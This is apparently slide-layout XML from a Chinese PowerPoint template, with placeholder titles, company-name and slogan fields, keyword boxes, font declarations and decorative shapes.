            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入标题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AAEBEDBB-4669-B74A-15F3-F098115110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46035" y="4206694"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入标题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9C34FA66-9ECE-5817-2F1B-3E8FEE2A2F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586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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zh-CN" altLang="en-US" sz="1200" i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OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰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08812654-E7C8-D365-44B3-38F61396C0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787" y="701902"/>
            <a:ext cx="2783703" cy="169341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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569651B2-38FF-4B24-EEA2-CAE1D9E804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26282" y="6476773"/>
            <a:ext cx="2563589" cy="159319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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6426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1F0EA2-CEF9-10F7-F9A7-847FFD1F2D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586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰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E88BF5E-AB75-7595-1DD2-7D8C8CC32D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599805" y="3408045"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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2EF5FDE7-F87C-4FCA-D11D-646D73F7CEFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398520" y="2874010"/>
            <a:ext cx="1814830" cy="1157605"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="14280000" scaled="0"/>
          </a:gra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 altLang="zh-CN" sz="1200" i="1">
              <a:effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst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5B8009F-74C7-8873-7ED9-5161ADD1CFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3684905" y="2665730"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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B8180F2-9E90-D4F4-49E7-A6000F04BC62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3311525" y="4258310"/>
            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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1D37D18E-0E33-D413-8B10-64F9EFFADE5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686506" y="2932476"/>
            <a:ext cx="1287369" cy="11178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>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="54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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序号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DA37D8BD-34E1-2FF9-2D2F-FEAF5D974A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58147" y="2891156"/>
            <a:ext cx="3136660" cy="78304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zh-CN" altLang="en-US" sz="6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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入标题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DCCDCE56-724F-A855-3745-817A451F1B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0618" y="3693291"/>
            <a:ext cx="2798461" cy="37777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zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入英文标题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45682D88-009F-F5CF-9AB9-6986519761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788" y="701902"/>
            <a:ext cx="2727098" cy="177664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty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EE464648-61F5-A38F-5E36-C8F6B5D9E6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26282" y="6476773"/>
            <a:ext cx="2563589" cy="159319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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905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86A2DAA-F6BA-BE22-98EF-CCC2C41B03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788" y="548221"/>
            <a:ext cx="2937128" cy="454546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-16768" t="-76235" r="-141930" b="-937885"/>
            </a:stretch>
          </a:blipFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="4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101600" dist="12700" sx="101000" sy="101000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="49BCDD">
                      <a:alpha val="10000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入正文标题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0CDD2648-BDBE-9DB0-52FB-3A7CB7607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26282" y="6476773"/>
            <a:ext cx="2563589" cy="159319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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030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B9064DFF-9B86-B85B-9FB4-C7B16BCE3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788" y="701902"/>
            <a:ext cx="2727098" cy="177664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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7372BC9B-42BB-AC82-7803-0A98F77482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26282" y="6476773"/>
            <a:ext cx="2563589" cy="159319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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-左图右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8145540-0171-0112-38C0-561C89B612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6625" y="1604963"/>
            <a:ext cx="4419600" cy="44910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30408C8F-3900-FA66-F806-F0B9E1CF1A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4275" y="1812154"/>
            <a:ext cx="2351541" cy="430530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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="2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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入标题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56FE7031-52B7-457F-783F-711C16F3CA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43968" y="2456217"/>
            <a:ext cx="4289643" cy="1837094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-138515" t="-139856" r="-22142" b="-150137"/>
            </a:stretch>
          </a:blipFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="0B184D">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="49BCDD"/>
                </a:soli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dirty="0"/>
              <a:t>在此输入内容在此输入内容在此输入内容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dirty="0"/>
              <a:t>在此输入内容在此输入内容在此输入内容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dirty="0"/>
              <a:t>在此输入内容在此输入内容在此输入内容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dirty="0"/>
              <a:t>在此输入内容在此输入内容在此输入内容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dirty="0"/>
              <a:t>在此输入内容在此输入内容在此输入内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/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A243F13A-74FD-19F9-EEFA-197FF6665B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17956" y="4954538"/>
            <a:ext cx="1173979" cy="4305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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键字</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="文本占位符 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{627CAF3E-A900-66D7-A23D-07321F1510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7955" y="5330012"/>
            <a:ext cx="1173979" cy="3370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zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入内容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ADCDDDAE-81D7-002D-2F44-93AC8FFB6C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13396" y="4953363"/>
            <a:ext cx="1173979" cy="4305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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键字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169205B9-0783-A251-9489-F3DB2851ED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13395" y="5328837"/>
            <a:ext cx="1173979" cy="3370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zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="文本占位符 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ACA790B-A812-26E5-DCB1-E72E2B8184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788" y="701902"/>
            <a:ext cx="2727098" cy="177664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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76A299CE-B70A-9C47-E907-8F61553AFF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26282" y="6476773"/>
            <a:ext cx="2563589" cy="159319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本占位符 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96690879-9A20-8682-A08E-65A0D0CD11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52427" y="4953363"/>
            <a:ext cx="1173979" cy="4305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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键字</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本占位符 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B92809B-8974-3072-FFBC-4D67518EA86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52426" y="5328837"/>
            <a:ext cx="1173979" cy="3370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indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4059175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F8676E7-857F-1E7A-C1B8-6E813292CED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8538845" y="3042285"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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3D2C6FB-CED1-F1FA-1FA1-1D11D25F2B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3601085" y="2147570"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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09E6F19-6362-E101-1534-CB825D0DD389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917065" y="4593590"/>
            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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BBD19C3B-1E8B-DC2F-5A86-9FF465AFDB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5577" y="2540248"/>
            <a:ext cx="4056436" cy="100407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>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="8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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>感谢观看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34AA96-2ED2-DD84-C30E-5A0F834B8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80201" y="3815715"/>
            <a:ext cx="8107188" cy="41553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zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/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4AE64AB4-FA49-734E-AC33-4C89AF8C25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586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰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E1AB67E0-7DD7-FABE-8839-DE3659842B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788" y="701902"/>
            <a:ext cx="2727098" cy="177664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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02AB00BB-5244-A256-9D71-EC3E4EB650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26282" y="6476773"/>
